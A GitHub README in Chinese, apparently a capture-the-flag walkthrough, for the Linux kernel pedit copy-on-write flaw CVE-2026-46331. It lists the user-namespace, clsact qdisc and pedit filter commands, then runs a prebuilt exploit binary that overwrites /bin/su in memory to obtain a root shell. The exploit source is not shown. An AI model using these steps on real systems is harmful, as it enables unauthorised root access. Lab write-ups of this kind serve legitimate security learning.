MarwahHadi/CVE-2026-46331-pedit-cow

GitHub: MarwahHadi/CVE-2026-46331-pedit-cow

该项目是 Linux 内核 pedit COW 漏洞(CVE-2026-46331)的分析说明与利用步骤写-up,演示了如何通过流量控制子系统缺陷实现本地提权。

Stars: 0 | Forks: 0

# CVE-2026-46331-pedit-cow 关于 pedit COW 漏洞 (CVE-2026-46331) 的分析说明与利用步骤。 ## 概述 该挑战展示了 pedit COW,这是 Linux 内核流量控制子系统中数据包编辑操作 (`act_pedit`) 的一个缺陷。该漏洞允许非特权用户覆盖 setuid-root 二进制文件的内存副本,从而无需触及磁盘上的文件即可获取 root shell。 ## 利用步骤 ### 1. 初始设置 环境以非特权用户 (`karen`) 身份启动。 ``` id cd ~/packet_edit_meme make packet_edit_meme ``` ### 2. 提权(创建 Namespace) 配置流量控制通常需要 CAP_NET_ADMIN 权限,而普通用户不具备此权限。我利用了非特权用户 namespace 来获取该权限。 ``` unshare -r -n ``` ### 3. 配置流量控制操作 在 namespace 内,我配置了 clsact qdisc 并应用了过滤器来触发 pedit 操作。 # 如有需要,清理任何现有配置 ``` tc qdisc del dev lo clsact ``` # 设置 qdisc 和过滤器 ``` tc qdisc add dev lo clsact ``` ``` tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64 ``` ### 4. 执行漏洞利用 设置好环境后,我退出了 root shell 并以非特权用户身份执行了漏洞利用程序。 ``` exit ./packet_edit_meme ``` ### 5. 最终结果 该漏洞利用成功覆盖了 /bin/su 的入口,提供了一个交互式的 root shell。 ``` # cat /root/flag.txt ``` THM{YOUR_FLAG_HERE}
标签:Linux内核, Web报告查看器, 安全渗透, 本地提权, 漏洞分析, 网络安全, 路径探测, 隐私保护